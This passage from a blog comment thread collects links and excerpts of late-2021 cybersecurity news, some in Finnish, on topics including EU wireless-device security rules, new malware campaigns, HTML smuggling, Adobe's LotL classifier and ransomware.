Since March, FCC commissioner Brendan Carr has made repeated calls for the legislation to be passed, saying at the time that the FCC has authorised 3,000 applications for Huawei networking equipment to be used.
“Once we have determined that Huawei or other gear poses an unacceptable national security risk, it makes no sense to allow that exact same equipment to be purchased and inserted into our communications networks as long as federal dollars are not involved. The presence of these insecure devices in our networks is the threat, not the source of funding used to purchase them,” Carr said at the time.
Tomi Engdahl says:
‘Trojan Source’ Bug Threatens the Security of All Code
https://krebsonsecurity.com/2021/11/trojan-source-bug-threatens-the-security-of-all-code/
Trojan Source:
Invisible Vulnerabilities
https://trojansource.codes/trojan-source.pdf
Tomi Engdahl says:
EU vaatii nyt enemmän laitteiden kyberturvalta
https://etn.fi/index.php?option=com_content&view=article&id=12770&via=n&datum=2021-11-01_16:17:04&mottagare=31202
Euroopan komissio on antanut uuden säädöksen, jonka mukaan valmistajien täytyy varmistaa langattomien laitteiden turvallisuus, ennen kuin niitä voidaan myydä EU:n markkinoilla. Radiolaitedirektiivin uudella säädöksellä vahvistetaan uudet oikeudelliset vaatimukset kyberturvallisuutta koskeville suojatoimenpiteille, jotka valmistajien on otettava huomioon tuotteiden suunnittelussa ja tuotannossa.
Säädöksen esitelleen unionin digitaalisesta valmiudesta vastaavan komissaari Margrethe Vestagerin mukaan verkkoon liitettyjen laitteidemme on oltava turvallisia.- Miten muuten voisimme käyttää niitä luottavaisin mielin ammatilliseen tai henkilökohtaiseen viestintään, Vestager kysyy.
Laitevalmistajille uusi säädös tuo lisää vastuita ja töitä. Esimerkiksi älypuhelimiin on sisällytettävä ominaisuuksia, joilla vältetään häiriöt viestintäverkoissa ja estetään se, että laitteita käytetään verkkosivustojen tai muiden palvelujen toiminnan häiritsemiseen.
Tomi Engdahl says:
Langattomien kyberturvaa halutaan vahvistaa
https://www.uusiteknologia.fi/2021/11/02/langattomien-kyberturvaa-halutaan-vahvistaa/
Euroopan komissio haluaa parantaa langattomien laitteiden kyberturvallisuutta. Uudella radiolaitedirektiiviin liittyvällä säädöksellä pyritään varmistamaan langattomien laitteiden turvallisuus, ennen kuin niitä voidaan myydä Euroopan unionin alueella. Säädöksen hyväksymisen jälkeen tulee vielä vuoteen 2024 kesään kestävä siirtymäaika ja uudet standardit valmistukseen.
Komissio vahvistaa langattomien laitteiden ja tuotteiden kyberturvallisuutta
https://ec.europa.eu/commission/presscorner/detail/fi/ip_21_5634
Komissio on ryhtynyt toimiin Euroopan markkinoilla olevien langattomien laitteiden kyberturvallisuuden parantamiseksi. Matkapuhelimet, älykellot, aktiivisuusmittarit ja älylelut ovat yhä kiinteämpi osa ihmisten arkea. Sen myötä myös kuluttajien kohtaamien kyberuhkien riski kasvaa. Tänään annetulla radiolaitedirektiiviin liittyvällä delegoidulla säädöksellä pyritään varmistamaan langattomien laitteiden turvallisuus, ennen kuin niitä voidaan myydä EU:n markkinoilla. Säädöksessä vahvistetaan uudet oikeudelliset vaatimukset kyberturvallisuutta koskeville suojatoimenpiteille, jotka valmistajien on otettava huomioon tuotteiden suunnittelussa ja tuotannossa. Sillä myös suojellaan kansalaisten yksityisyyttä ja henkilötietoja, pienennetään taloudellisten petosten riskiä ja parannetaan viestintäverkkojen häiriönsietokykyä.
Tomi Engdahl says:
Uutta apua tekoälyn kyberturvallisuuteen
https://www.uusiteknologia.fi/2021/11/03/uutta-apua-tekoalyn-kyberturvallisuuteen/
Liikenne- ja viestintävirasto Traficomin kyberturvallisuuskeskus on kehittänyt uuden työkalun tekoälyn kyberturvallisuuden riskienhallintaan. Sitä tukee myös uusi Suomen ensimmäinen kyberturvallisuuden ja riskienhallinnan näkökulmasta tehty tekoälyselvitys.
Tekoälyn soveltamisen kyberturvallisuus ja riskienhallinta
https://www.traficom.fi/sites/default/files/media/publication/Teko%C3%A4lyn%20soveltamisen%20kyberturvallisuus%20ja%20riskienhallinta.pdf
Tomi Engdahl says:
EU to adopt new cybersecurity rules for smartphones, wireless, IoT devices
https://therecord.media/eu-to-adopt-new-cybersecurity-rules-for-smartphones-wireless-iot-devices/
The European Commission has ordered an update to the Radio Equipment Directive in order to introduce new cybersecurity guidelines for radio and wireless equipment sold on the EU market, such as mobile phones, tablets, fitness trackers, and other smart IoT devices.
The new standards, which are currently scheduled to enter into effect by mid-2024, were adopted following a delegated act to the Radio Equipment Directive (RED), a piece of 2014 EU legislation that acts as the regulatory framework that equipment vendors must follow in order to sell electronic equipment on the EU market.
The delegated act, which is a bureaucratic mechanism used by the European Commission to tell EU bodies to update legislation, lists three new security measures that device makers must incorporate in the design of their products in order to be allowed to sell products in the EU. These include:
Improve network resilience: Wireless devices and products will have to incorporate features to avoid harming communication networks and prevent the possibility that the devices are used to disrupt website or other services functionality.
Better protect consumers’ privacy: Wireless devices and products will need to have features to guarantee the protection of personal data. The protection of children’s rights will become an essential element of this legislation. For instance, manufacturers will have to implement new measures to prevent unauthorised access or transmission of personal data.
Reduce the risk of monetary fraud: Wireless devices and products will have to include features to minimise the risk of fraud when making electronic payments. For example, they will need to ensure better authentication control of the user in order to avoid fraudulent payments.
Tomi Engdahl says:
To Joke or Not to Joke: COVID-22 Brings Disaster to MBR https://www.fortinet.com/blog/threat-research/to-joke-or-not-to-joke-covid-22-brings-disaster-to-mbr
Even now, almost two years after the COVID-19 pandemic started, there is no sign that cybercriminals will stop taking advantage of the situation as an attack vector. This time, however, this attacker uses a COVID pandemic that has not yet happened as bait. FortiGuard Labs recently discovered a new malware posing as a mysterious COVID22 installer. While containing many of the features of “joke” malware, it is also destructive, causing infected machines to fail to boot.
Because it has no features for encrypting data demanding a ransom to undo the damage it inflicts, it is instead a new destructive malware variant designed to render affected systems inoperable. This blog explains how this malware works.
Tomi Engdahl says:
Golang Malware Is More than a Fad: Financial Motivation Drives Adoption https://www.crowdstrike.com/blog/financial-motivation-drives-golang-malware-adoption/
CrowdStrike researchers uncovered an 80% increase in Golang (Go)-written malware samples from June to August 2021, according to CrowdStrike threat telemetry. In terms of malware type, first place goes to coin miners, accounting for 70% of the malware spectrum in August 2021.
Tomi Engdahl says:
Living off the Land (LotL) Classifier Open-Source Project
https://medium.com/adobetech/living-off-the-land-lotl-classifier-open-source-project-b167484c8187
Tomi Engdahl says:
Living off the Land (LotL) Classifier Open-Source Project
https://medium.com/adobetech/living-off-the-land-lotl-classifier-open-source-project-b167484c8187
In security, “Living off the Land” (LotL or LOTL)-type attacks are not new. Bad actors have been using legitimate software and functions to target systems and carry out malicious attacks for many years. And although it’s not novel, LotL is still one of the preferred approaches even for highly skilled attackers. Why? Because hackers tend not to reinvent the wheel and prefer to keep a low profile, i.e., leave no “footprints,” such as random binaries or scripts on the system. Interestingly, these stealthy moves are exactly why it’s often very difficult to determine which of these actions are a valid system administrator and which are an attacker. It’s also why static rules can trigger so many false positives and why compromises can go undetected.
Most antivirus vendors do not treat executed commands (from a syntax and vocabulary perspective) as an attack vector, and most of the log-based alerts are static, limited in scope, and hard to update. Furthermore, classic LotL detection mechanisms are noisy and somewhat unreliable, generating a high number of false positives, and because typical rules grow organically, it becomes easier to retire and rewrite the rules rather than maintain and update them.
The security intelligence team at Adobe set out to help fix this problem. Using open source and other representative incident data, we developed a dynamic and high-confidence program, called LotL Classifier, and then we open sourced it to the broader community.
The LotL Classifier is unique because it uses a supervised learning approach — this means it maps an input to an output based on example input-output pairs.
https://github.com/adobe/libLOL
Tomi Engdahl says:
Google, Adobe Announce New Open Source Security Tools
https://www.securityweek.com/google-adobe-announce-new-open-source-security-tools
Google and Adobe this week announced the availability of new open source security tools, for continuous fuzzing and detecting living-off-the-land attacks.
Google releases ClusterFuzzLite
Google announced the open source release of ClusterFuzzLite, which it described as a ClusterFuzz-based continuous fuzzing solution that runs as part of continuous integration (CI) workflows in an effort to help users find vulnerabilities before they are committed to the source code.
ClusterFuzzLite can be integrated into CI workflows with only a few lines of code.
https://github.com/google/clusterfuzzlite
Adobe releases LotL Classifier
Living-off-the-land (LotL) is used to describe attacks where malicious actors leverage legitimate software in an effort to avoid being detected.
Adobe has released an open source tool, named LotL Classifier, that is designed to detect LotL attacks by leveraging a “feature extraction” component and a machine learning-based classifier algorithm.
https://github.com/adobe/libLOL
https://www.securityweek.com/extensive-living-land-hides-stealthy-malware-campaign
Tomi Engdahl says:
Aisha Counts / Protocol:
Report finds that online child sexual abuse material is increasing in sheer volume, growing more complex, and capitalizing on tech’s blind spots
Child sexual abuse is exploding online. Tech’s best defenses are no match.
https://www.protocol.com/policy/csam-child-safety-online
A new report argues there’s more tech companies can do to stop child sexual abuse material from spreading online without sacrificing privacy.
Tomi Engdahl says:
Chinas cyber watchdog unveils new draft data management regulations https://therecord.media/chinaa-cyber-watchdog-unveils-new-draft-data-management-regulations/
The Cyberspace Administration of China, the nations cybersecurity watchdog, issued a set of draft regulations on Sunday aimed at protecting the nations internet data security.
Tomi Engdahl says:
How Attackers Exploit the Remote Desktop Protocol
https://securityintelligence.com/articles/exploiting-remote-desktop-protocol/
Tomi Engdahl says:
Researchers Demonstrate New Fingerprinting Attack on Tor Encrypted Traffic https://thehackernews.com/2021/11/researchers-demonstrate-new.html
A new analysis of website fingerprinting (WF) attacks aimed at the Tor web browser has revealed that it’s possible for an adversary to glean a website frequented by a victim, but only in scenarios where the threat actor is interested in a specific subset of the websites visited by users.
Tomi Engdahl says:
Exchange Exploit Leads to Domain Wide Ransomware
https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/
We observed an intrusion where an adversary exploited multiple Exchange vulnerabilities (ProxyShell) to drop multiple web shells.
Over the course of three days, three different web shells were dropped in publicly accessible directories. These web shells, exposed to the internet, were used to execute arbitrary code on the Microsoft Exchange Server utilizing PowerShell and cmd.
Tomi Engdahl says:
We wait, because we know you. Inside the ransomware negotiation economics.
https://research.nccgroup.com/2021/11/12/we-wait-because-we-know-you-inside-the-ransomware-negotiation-economics/
Tomi Engdahl says:
Four Things Your CISO Wants Your Board to Know
https://www.securityweek.com/four-things-your-ciso-wants-your-board-know
In Order to Adequately Protect an Organization, Your Cybersecurity Budget Should be More Than 1% of Your Overall IT Spend
It’s been said time and time again: when it comes to cybersecurity, don’t skimp. Global IT spending has risen over the years to keep pace with today’s threats. ISG Research said earlier this summer that cybersecurity spending has nearly doubled year-over-year. As a percentage of total IT spending, it accounted for 4.7 percent in 2020, compared to 2.5 percent in 2019. Organizations should be spending at least that much to ensure they’re prepared to combat the threats of tomorrow.
It’s Impossible to Provide Metrics on how Many Advanced Persistent Threats You’ve Blocked in the Past Month
I’ve stressed this for years. One of the most misleading metrics in cybersecurity remains the number of threats your organization has blocked. Sure, it sounds great in theory to say you’ve blocked x number of threats across your perimeter and endpoints, but sometimes metrics can fail to reflect the hard work your team is doing day in, day out.
Focus on metrics that build trust instead of causing confusion. Consider providing details including:
• Cyber threat dwell time – how long was an adversary in your system before you discovered them?
• Patching and vulnerability metrics – how long did it take for your team to fix an issue or roll out a patch for a vulnerability?
• For high-risk items, what’s the mean time to closure?
• How many incidents did your team identify and remedy?
• And if you’ve recently integrated a new security solution or introduced a cybersecurity initiative – like rolling out multi-factor authentication or a phishing awareness exercise – what was the result?
Building a Culture of Cybersecurity as a Top-down Strategy is Imperative
Sure, getting and maintaining executive buy-in is important but cybersecurity is a team effort. CISOs need to build a culture where all team members understand the importance of your program and their role in cybersecurity. It’s everyone’s responsibility to keep an organization safe. Like any other companywide effort, this can be effective when the messaging comes from the top.
Align Your Cybersecurity Strategy to an Acceptable Framework that Demonstrates Maturity Over Time
Just because an organization hires a CISO doesn’t mean it’s secure on day one. Cybersecurity needs nurturing; it can take time to build and develop a robust program.
One of the first steps is ensuring the board understands where the organization is today in terms of control maturity. From there, you can develop a plan to achieve higher levels of maturity over time.
Tomi Engdahl says:
Microsoft Says HTML Smuggling Attacks On The Rise
https://www.securityweek.com/microsoft-says-html-smuggling-attacks-rise
Microsoft says it has observed an increase in the use of HTML smuggling in malicious attacks distributing remote access Trojans (RATs), banking malware, and other malicious payloads.
HTML smuggling leverages HTML5/JavaScript for the download of files onto a victim machine, which in this case of these attacks is an encoded malicious script designed to assemble the final payload directly on the victim computer.
Phishing emails are used to either deliver specially crafted HTML attachments or to direct the intended victim to a web page malicious page designed to smuggle the script.
Microsoft said it observed the Chinese threat actor NOBELIUM leveraged the technique in a series of attacks in May, and is now seeing the same method being used to deliver AsyncRAT/NJRAT, Trickbot, and the banking Trojan Mekotio.
Because the malicious payload is built behind the firewall, the technique allows adversaries to easily bypass standard perimeter security controls that check network traffic for suspicious attachments or patterns.
“Because the malicious files are created only after the HTML file is loaded on the endpoint through the browser, what some protection solutions only see at the onset are benign HTML and JavaScript traffic, which can also be obfuscated to further hide their true purpose,” Microsoft said.
Tomi Engdahl says:
Martin Matishak / The Record:
DHS issues an interim rule that will, once finalized, let it hire cybersecurity professionals at salaries of up to $255,800 and up to $332,100 in special cases
DHS launches new effort to attract cybersecurity talent
https://therecord.media/dhs-launches-new-effort-to-attract-cybersecurity-talent/
Tomi Engdahl says:
Daniel Flatley / Bloomberg:
The US and Israel partner to fight ransomware attacks and threats to the global financial system
https://www.bloomberg.com/news/articles/2021-11-14/u-s-israel-join-forces-to-combat-ransomware-attacks